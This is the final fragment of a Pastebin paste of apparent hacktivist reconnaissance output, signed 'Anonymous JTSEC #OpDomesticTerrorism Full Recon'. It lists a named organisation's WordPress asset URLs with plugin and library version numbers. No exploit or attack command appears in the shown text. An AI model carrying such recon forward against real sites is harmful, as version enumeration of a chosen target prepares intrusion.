  1607. | http://www.njoathkeepers.org/wp-content/plugins/event-organiser/css/eventorganiser-front-end.min.css?ver=3.7.2
  1608. | http://www.njoathkeepers.org/wp-includes/css/dashicons.min.css?ver=4.9.6
  1609. | http://www.njoathkeepers.org/wp-includes/js/jquery/jquery.js?ver=1.12.4
  1610. #######################################################################################################################################
  1611.                                       Anonymous JTSEC #OpDomesticTerrorism JTSEC Full Recon #1
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top